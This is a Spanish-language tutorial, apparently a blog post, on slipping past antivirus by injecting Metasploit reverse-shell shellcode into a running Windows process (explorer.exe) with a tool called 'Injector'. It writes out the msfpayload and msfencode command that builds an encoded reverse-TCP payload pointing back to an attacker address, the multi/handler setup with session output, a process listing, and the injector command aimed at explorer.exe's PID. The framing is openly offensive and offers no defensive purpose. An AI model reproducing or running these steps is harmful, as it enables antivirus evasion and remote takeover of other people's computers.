Inyectar codigo shell a través de un proceso

Esta es una nueva herramienta para ‘bypassear’ antivirus que dejaría a un atacante inyectar código shell a través de una explotación de un proceso. Habilitando al atacante una shell a una locación remota, generalmente, se asume que podría ser un shell meterpreter por algunas obvias razones.

Acá dejaremos un pequeño tutorial de cómo obtener una shell remota mediante la inyección en un proceso con el Injector.

Lo primero que debemos hacer es usar Metasploit. Aqui estaremos usando el meterpreter ‘shell_reverse_tcp’. Ahi al final nos da la función ‘./msfencode’, el cual con el ‘alpha_upper’ tratará de codificar el shellcode y añadir una tarea de función de salida.

root@cholohack:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.5 LPORT=4444 EXITFUNC=thread R | ./msfencode -e x86/alpha_upper

A partir de ahora, iniciaremos un multi-handler:

msf > use multi/handler
msf exploit(handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.5:4444
[*] Starting the payload handler…
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.2:2438) at Tue Aug 17 20:30:20 -0400 2010
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Users\Administrator> LISTO PARA SHELLEAR (No chelear xD)

Con este payload todo está codificado y así eliminar cualquier caracter no válido y con el mult-handler puedes recibir la shell remota sin problemas.

C:\Users\Administrator\Documents\injector> tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0         24 K
System                           4 Services                   0      2,532 K
smss.exe                       264 Services                   0      1,104 K
csrss.exe                      384 Services                   0      4,160 K
wininit.exe                    444 Services                   0      4,388 K
csrss.exe                      464 Console                    1     46,160 K
winlogon.exe                   512 Console                    1      6,984 K
services.exe                   552 Services                   0     10,444 K
lsass.exe                      560 Services                   0     12,304 K
dwm.exe                       1344 Console                    1     30,788 K
explorer.exe                  1988 Console                    1     72,408 K
taskhost.exe                  2016 Console                    1      9,348 K
OSPPSVC.EXE                   2360 Services                   0     10,004 K
GoogleDesktop.exe             3040 Console                    1      6,992 K
svchost.exe                   2076 Services                   0      5,488 K
AvastUI.exe                   2260 Console                    1      3,360 K
vmnat.exe                     2484 Services                   0      5,152 K
TeamViewer.exe                2288 Console                    1     19,680 K
svchost.exe                   1684 Services                   0      2,608 K
vmware-tray.exe               3092 Console                    1      4,496 K

Nuestro explorer tiene como PID el 1988.

Usamos ahora la herramienta ‘INJECTOR’ de esta manera:

C:\Users\Administrator\Documents\injector>injector.exe pgeneric.txt 1988

[*] Author: DouBle_Zer0
[*] HACKERS GARAGE Production
[*] Visit Us: http://www.garage4hackers.com

C:\Documents and Settings\Administrator\Desktop\injector> Your payload was just sent!! check your meterpreter

Acá está la herramienta y explicación original y el video original. Espero que les haya gustado esta explicación, cualquier duda no duden en preguntarmelo.